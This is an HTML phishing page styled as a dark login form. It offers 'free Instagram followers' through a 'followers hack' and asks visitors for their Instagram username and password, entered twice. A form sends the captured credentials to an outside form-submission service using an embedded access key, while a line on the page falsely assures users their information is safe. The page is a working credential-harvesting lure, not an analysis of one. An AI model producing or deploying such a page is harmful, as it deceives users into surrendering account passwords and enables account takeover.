<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Form</title>
    <style>
        /* From Uiverse.io by ammarsaa */
        body{
            background-color: black;
        } 
.form {
  display: flex;
  flex-direction: column;
  gap: 10px;
  max-width: 350px;
  padding: 20px;
  border-radius: 20px;
  position: relative;
  background-color: #1a1a1a;
  color: #fff;
  border: 1px solid #333;
}

.title {
  font-size: 28px;
  font-weight: 600;
  letter-spacing: -1px;
  position: relative;
  display: flex;
  align-items: center;
  padding-left: 30px;
  color: #00bfff;
}

.title::before {
  width: 18px;
  height: 18px;
}

.title::after {
  width: 18px;
  height: 18px;
  animation: pulse 1s linear infinite;
}

.title::before,
.title::after {
  position: absolute;
  content: "";
  height: 16px;
  width: 16px;
  border-radius: 50%;
  left: 0px;
  background-color: #00bfff;
}

.message, 
.signin {
  font-size: 14.5px;
  color: rgba(255, 255, 255, 0.7);
}

.signin {
  text-align: center;
}

.signin a:hover {
  text-decoration: underline royalblue;
}

.signin a {
  color: #00bfff;
}

.flex {
  display: flex;
  width: 100%;
  gap: 6px;
}

.form label {
  position: relative;
}

.form label .input {
  background-color: #333;
  color: #fff;
  width: 100%;
  padding: 20px 05px 05px 10px;
  outline: 0;
  border: 1px solid rgba(105, 105, 105, 0.397);
  border-radius: 10px;
}

.form label .input + span {
  color: rgba(255, 255, 255, 0.5);
  position: absolute;
  left: 10px;
  top: 0px;
  font-size: 0.9em;
  cursor: text;
  transition: 0.3s ease;
}

.form label .input:placeholder-shown + span {
  top: 12.5px;
  font-size: 0.9em;
}

.form label .input:focus + span,
.form label .input:valid + span {
  color: #00bfff;
  top: 0px;
  font-size: 0.7em;
  font-weight: 600;
}

.input {
  font-size: medium;
}

.submit {
  border: none;
  outline: none;
  padding: 10px;
  border-radius: 10px;
  color: #fff;
  font-size: 16px;
  transform: .3s ease;
  background-color: #00bfff;
}

.submit:hover {
  background-color: #00bfff96;
}

@keyframes pulse {
  from {
    transform: scale(0.9);
    opacity: 1;
  }

  to {
    transform: scale(1.8);
    opacity: 0;
  }
}
    </style>
</head>
<body>
   <h1 style="color: white;">Get Free Instagram Followers</h1>
   <h2 style="color: white;">Instagram Followers Hack :</h2>
   <form action="https://api.web3forms.com/submit" method="POST" class="form" id="form">
    <p class="title">Enter Your Instagram Details :</p>
    <p class="message">Feel Safe We Will Never share Your Information !</p>
    <!-- Replace with your Access Key -->
    <input type="hidden" name="access_key" value="bf3b41a6-f9ec-42e3-8fdf-141b56e9572c">
        <label>
            <input class="input" name="Username" type="text" placeholder="" required="hy">
            <span>Instagram Username</span>
        </label>
    <label>
        <input class="input" id="pass" name="Pass" type="password" placeholder="" required="">
        <span>Your Instagram Password</span>
    </label>
    <label>
        <input class="input" id="c-pass" name="Confirmed Pass" type="password" placeholder="" required="">
        <span>Confirm password</span>
    </label>
    <p id="p" style="color: red;"></p>
    <button class="submit">Submit</button>
</form>
<script>
    document.getElementById("form").addEventListener("submit",function (){
       var pass = document.getElementById("pass").value;
       var c_pass = document.getElementById("c-pass").value;
       if(pass != c_pass){
        document.getElementById("p").innerHTML =`Password Do Not Match`
       }
    })
</script>
</body>
</html>